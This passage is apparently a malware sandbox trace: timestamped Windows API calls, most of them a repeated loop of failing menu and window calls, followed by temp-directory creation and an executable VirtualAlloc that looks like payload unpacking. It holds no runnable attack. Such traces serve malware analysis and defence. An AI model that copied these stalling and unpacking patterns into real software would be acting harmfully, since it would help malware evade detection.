lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.740] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.740] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.740] GetMenu (hWnd=0x0) returned 0x0 [0027.740] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.740] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.740] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.740] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.740] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.740] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.740] GetStockObject (i=6) returned 0x1b00018 [0027.740] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.740] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.740] PathFileExistsW (pszPath=0x0) returned 0 [0027.741] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.741] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.741] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.741] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.741] GetMenu (hWnd=0x0) returned 0x0 [0027.741] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.741] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.741] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.741] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.741] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.741] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.741] GetStockObject (i=6) returned 0x1b00018 [0027.741] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.741] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.741] PathFileExistsW (pszPath=0x0) returned 0 [0027.741] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.741] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.741] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.741] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.741] GetMenu (hWnd=0x0) returned 0x0 [0027.741] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x44d) returned -1 [0027.741] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.741] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.741] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.741] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.741] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.741] GetStockObject (i=6) returned 0x1b00018 [0027.741] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.741] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.741] PathFileExistsW (pszPath=0x0) returned 0 [0027.741] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.741] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.742] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.742] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.742] GetMenu (hWnd=0x0) returned 0x0 [0027.742] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.742] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.742] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.742] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.742] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.742] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.742] GetStockObject (i=6) returned 0x1b00018 [0027.742] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.742] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.742] PathFileExistsW (pszPath=0x0) returned 0 [0027.742] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.742] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.742] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.742] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.742] GetMenu (hWnd=0x0) returned 0x0 [0027.742] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.742] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.742] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.742] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.742] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.742] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.742] GetStockObject (i=6) returned 0x1b00018 [0027.742] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.742] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.742] PathFileExistsW (pszPath=0x0) returned 0 [0027.742] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.742] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.742] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.742] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.742] GetMenu (hWnd=0x0) returned 0x0 [0027.742] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.743] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.743] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.743] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.743] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.743] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.743] GetStockObject (i=6) returned 0x1b00018 [0027.743] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.743] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.743] PathFileExistsW (pszPath=0x0) returned 0 [0027.743] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.743] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.743] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.743] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.743] GetMenu (hWnd=0x0) returned 0x0 [0027.743] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.743] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.743] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.743] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.743] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.743] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.743] GetStockObject (i=6) returned 0x1b00018 [0027.743] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.743] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.743] PathFileExistsW (pszPath=0x0) returned 0 [0027.743] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.743] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.743] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.743] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.743] GetMenu (hWnd=0x0) returned 0x0 [0027.743] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xd7) returned -1 [0027.743] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.743] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.743] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.743] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.744] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.744] GetStockObject (i=6) returned 0x1b00018 [0027.744] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.744] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.744] PathFileExistsW (pszPath=0x0) returned 0 [0027.744] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.744] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.744] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.744] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.744] GetMenu (hWnd=0x0) returned 0x0 [0027.744] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.744] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.744] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.744] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.744] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.744] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.744] GetStockObject (i=6) returned 0x1b00018 [0027.744] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.744] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.744] PathFileExistsW (pszPath=0x0) returned 0 [0027.744] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.744] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.744] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.744] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.744] GetMenu (hWnd=0x0) returned 0x0 [0027.744] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.744] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.744] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.744] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.744] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.744] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.744] GetStockObject (i=6) returned 0x1b00018 [0027.744] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.744] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.745] PathFileExistsW (pszPath=0x0) returned 0 [0027.745] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.745] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.745] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.745] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.745] GetMenu (hWnd=0x0) returned 0x0 [0027.745] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.745] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.745] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.745] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.745] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.745] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.745] GetStockObject (i=6) returned 0x1b00018 [0027.745] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.745] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.745] PathFileExistsW (pszPath=0x0) returned 0 [0027.745] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.745] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.745] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.745] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.745] GetMenu (hWnd=0x0) returned 0x0 [0027.745] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.745] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.745] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.745] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.745] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.745] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.746] GetStockObject (i=6) returned 0x1b00018 [0027.746] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.746] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.746] PathFileExistsW (pszPath=0x0) returned 0 [0027.746] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.746] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.746] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.746] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.746] GetMenu (hWnd=0x0) returned 0x0 [0027.746] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x236) returned -1 [0027.746] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.746] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.746] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.746] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.746] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.746] GetStockObject (i=6) returned 0x1b00018 [0027.746] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.746] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.746] PathFileExistsW (pszPath=0x0) returned 0 [0027.746] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.746] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.746] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.746] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.746] GetMenu (hWnd=0x0) returned 0x0 [0027.746] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.746] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.746] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.746] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.746] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.746] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.746] GetStockObject (i=6) returned 0x1b00018 [0027.746] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.746] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.747] PathFileExistsW (pszPath=0x0) returned 0 [0027.747] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.747] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.747] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.747] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.747] GetMenu (hWnd=0x0) returned 0x0 [0027.747] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.747] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.747] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.747] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.747] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.747] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.747] GetStockObject (i=6) returned 0x1b00018 [0027.747] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.747] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.747] PathFileExistsW (pszPath=0x0) returned 0 [0027.747] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.747] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.747] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.747] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.747] GetMenu (hWnd=0x0) returned 0x0 [0027.747] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.747] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.747] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.747] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.747] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.747] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.747] GetStockObject (i=6) returned 0x1b00018 [0027.747] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.747] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.747] PathFileExistsW (pszPath=0x0) returned 0 [0027.747] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.747] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.747] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.748] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.748] GetMenu (hWnd=0x0) returned 0x0 [0027.748] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.748] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.748] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.748] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.748] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.748] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.748] GetStockObject (i=6) returned 0x1b00018 [0027.748] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.756] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce12f8 | out: hHeap=0x1ce0000) returned 1 [0027.756] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce12d0 | out: hHeap=0x1ce0000) returned 1 [0027.756] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce12c0 | out: hHeap=0x1ce0000) returned 1 [0027.756] SendMessageA (hWnd=0x0, Msg=0x418, wParam=0x0, lParam=0x0) returned 0x0 [0027.756] SetRect (in: lprc=0x18f56c, xLeft=0, yTop=0, xRight=0, yBottom=0 | out: lprc=0x18f56c) returned 1 [0027.756] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0027.756] GetTempPathA (in: nBufferLength=0x27, lpBuffer=0x1ded090 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0027.756] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c20000 [0027.757] GetTempFileNameA (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x18f724 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7934.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7934.tmp")) returned 0x7934 [0027.758] DeleteFileA (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7934.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7934.tmp")) returned 1 [0027.759] CreateDirectoryA (lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7934.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7934.tmp"), lpSecurityAttributes=0x0) returned 1 [0027.759] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0027.759] VirtualAlloc (lpAddress=0x0, dwSize=0x32000, flAllocationType=0x3000, flProtect=0x40) returned 0x250000 [0027.760] GetDlgItem (hDlg=0x0, nIDDlgItem=200) returned 0x0 [0027.760] GetWindowRect (in: hWnd=0x0, lpRect=0x18f5f4 | out: lpRect=0x18f5f4) returned 0 [0027.760] GetDlgItem (hDlg=0x0, nIDDlgItem=149) returned 0x0 [0027.761] GetWindowRect (in: hWnd=0x0, lpRect=0x18f588 | out: lpRect=0x18f588) returned 0 [0027.761] GetUpdateRect (in: hWnd=0x1, lpRect=0x18f60c, bErase=0 | out: lpRect=0x18f60c) returned 0 [0027.761] GetForegroundWindow () returned 0x101ae [0027.761] GetWindow (hWnd=0x0, uCmd=0x4) returned 0x0 [0027.761] GetParent (hWnd=0x0) returned 0x0 [0027.761] SendMessageA (hWnd=0x0, Msg=0x223, wParam=0x0, lParam=0x0) returned 0x0 [0027.761] SendMessageA (hWnd=0x0, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x0 [0027.761] GetParent (hWnd=0x0) returned 0x0 [0027.761] SendMessageA (hWnd=0x0, Msg=0x221, wParam=0x0, lParam=0x0) returned 0x0 [0027.761] GetDlgItem (hDlg=0x0, nIDDlgItem=-232) returned 0x0 [0027.761] GetDlgItem (hDlg=0x0, nIDDlgItem=-232) returned 0x0 [0027.761] GdiplusStartup (in: token=0x18f384, input=0x18f3e4, output=0x0 | out: token=0x18f384, output=0x0) returned 0x0 [0028.087] BeginPaint (in: hWnd=0x0, lpPaint=0x18f414 | out: lpPaint=0x18f414) returned 0x0 [0028.087] EndPaint (hWnd=0x0, lpPaint=0x18f414) returned 0 [0028.087] CreateWindowExA (dwExStyle=0x0, lpClassName="button", lpWindowName=0x0, dwStyle=0x5000000b, X=250, Y=200, nWidth=32, nHeight=32, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x0 [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 